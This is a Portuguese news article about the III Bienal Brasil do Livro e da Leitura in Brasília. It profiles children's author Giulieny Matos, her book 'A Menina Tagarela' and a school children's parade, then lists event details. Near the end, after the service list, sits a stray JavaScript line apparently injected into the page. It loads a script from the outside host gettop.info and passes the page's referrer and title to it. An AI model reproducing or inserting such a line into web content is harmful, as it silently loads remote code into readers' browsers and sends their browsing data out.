Divertimento para crianças na Bienal do Livro

A III Bienal Brasil do Livro e da Leitura deste ano lançará 16 novos autores do Distrito Federal e homenageará a poetisa e contista brasileira Adélia Prado e o escritor português Boaventura de Sousa Santos, autor de Direito do Oprimido. O evento começa nessa sexta-feira (21) no Mané Garrincha. Além do lançamento de novos escritores, o evento terá programação diversificada, como campanha de doação de livros e brincadeira para crianças.

giulieny-matos-apresentacao-casa-park
Giulieny Matos em uma de suas atividades com crianças

Entre os 16 autores do DF, escolhidos num universo de 81 concorrentes, está Giulieny Matos.  Muito feliz, ela conversou com o Brasília Capital. “Gosto muito de escrever e vamos lançar A Menina Tagarela.” A obra é inspirada na filha de uma prima que adora conversar e é destinada a crianças até sete anos não leitoras. Por isso, os textos são simples e curtos com grandes ilustrações de Luna Vicente. Mas, esse não é o primeiro livro de Giulieny. Ela já escreveu também A Menina Derretida, que faz grande sucesso entre os pequenos.

O projeto de Giulieny Matos não se restringe ao lançamento do livro. Por abordar um dos temas transversais, ela visita escolas onde faz palestras e promove brincadeiras para reflexão de temas ligados a inclusão. E essa é a abordagem que ela levará ao box Banca 308, na Bienal.

menina_tagarela_capa
Livro de Giulieny Matos que será lançado na Bienal

Para o lançamento dessa segunda obra dia 23 (domingo), Giulieny Matos promoverá um desfile juntamente com a loja Cirandinha. Dele participarão 20 meninas e meninos, alunos da Escola Classe 18 de Ceilândia. A protagonista da história com cabelo afrodescendente é a inspiração e todas as crianças estão adorando participar. Bernadeth Martins, uma das organizadoras do desfile, afirma que “os pequenos estão realizando o sonho de desfilar no tapete vermelho e os pais também estão curtindo muito”.

 

Serviço:

  • III Bienal Brasil do Livro e da Leitura
  • De 21 a 30 de outubro
  • Local: Estádio Mané Garricha
  • Entrada franca
  • Mais informações: www.bienalbrasildolivro.com.br

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário